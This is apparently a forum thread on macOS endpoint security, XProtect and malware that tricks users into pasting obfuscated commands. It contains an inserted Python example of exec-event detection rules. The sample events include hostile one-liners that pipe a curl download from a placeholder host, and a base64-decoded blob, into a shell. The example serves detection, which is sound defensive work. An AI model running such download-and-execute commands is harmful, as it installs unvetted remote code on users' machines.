Endpoint security software on the Mac, if it's worth the hit to system resources that is, inspects every call to exec and fork that occurs in the kernel and also inspects those for known attack vectors, malicious scripts, etc. The one I have installed on my work Mac will kill reverse shell attempts before they are run. It will stop keychain attacks and infostealing (as they can also get every file system op as it is happening in the kernel).
Antivirus programs will run on PowerShell scripts, VBScript files, JScript files, and all other kinds of automation on Windows.
The article specifically mentions that the methodology here is to trick users into running an obfuscated CLI command... that downloads and runs a binary.
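The per-exec inspection described in the first comment, applied to the download-and-run one-liner the article's methodology comment describes, as detection logic run over constructed exec events (an added example, not code from this thread or from any product; the event layout, the rule names and the URL are assumptions):

```python
import shlex
# Constructed sample of exec events, in the spirit of what an endpoint security
# agent sees per exec() call. Layout is an assumption, not a vendor format;
# the URL and the base64 blob are placeholders.
SAMPLE_EVENTS = [
    {"pid": 4101, "argv": ["ls", "-la"]},
    {"pid": 4102, "argv": ["sh", "-c", "echo UExBQ0VIT0xERVI= | base64 -d | sh"]},
    {"pid": 4103, "argv": ["bash", "-c", "curl -fsSL http://example.invalid/update | sh"]},
    {"pid": 4104, "argv": ["curl", "-fsSL", "http://example.invalid/update"]},
]
SHELLS = {"sh", "bash", "zsh"}
DOWNLOADERS = {"curl", "wget"}
def base(path):
    return path.rsplit("/", 1)[-1]

def inline_script(argv):
    """Return the script text when argv is a shell invoked with -c, else None."""
    if len(argv) >= 3 and base(argv[0]) in SHELLS and argv[1] == "-c":
        return argv[2]
    return None

def pipeline_stages(script):
    """Split a one-liner on '|' and tokenise each stage (naive: '||' and quoted pipes are not handled)."""
    stages = []
    for stage in script.split("|"):
        try:
            words = shlex.split(stage)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            words = stage.split()
        if words:
            stages.append(words)
    return stages

def classify(event):
    """Return the names of the rules that fire for one exec event."""
    script = inline_script(event["argv"])
    if script is None:
        return []
    hits, stages = [], pipeline_stages(script)
    for producer, consumer in zip(stages, stages[1:]):
        src, dst = base(producer[0]), base(consumer[0])
        if src in DOWNLOADERS and dst in SHELLS:
            hits.append("download-piped-to-shell")
        if src == "base64" and ("-d" in producer or "--decode" in producer) and dst in SHELLS:
            hits.append("decoded-payload-piped-to-shell")
    return hits

def scan(events):
    """Map pid -> fired rules for every event that matched at least one rule."""
    return {e["pid"]: h for e in events if (h := classify(e))}
```

A real agent would apply rules like these at the exec authorization point and deny the call rather than report after the fact.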
wpm|21 days ago
Gatekeeper and Xprotect are good, but there's only so much they can do.
sciencejerk|20 days ago
jeroenhd|20 days ago
The screenshots from the article clearly show a permission prompt for a program. Whether that's a binary or a shell script or something else doesn't matter, the infection stage should've been caught by anti malware rather than permission prompts.
Windows Defender does this already. If Apple's AV can't catch this, I think they may be relying on their DRM-as-a-security-measure (signatures, notarisation, etc.) a bit too much.
tokyobreakfast|21 days ago
Clearly it isn't. XProtect is a joke. It's 2004-era ClamAV level of protection.
sithadmin|21 days ago
GeekyBear|21 days ago
In this case, the user is warned that the command wants to do something dangerous and must manually allow or deny the action.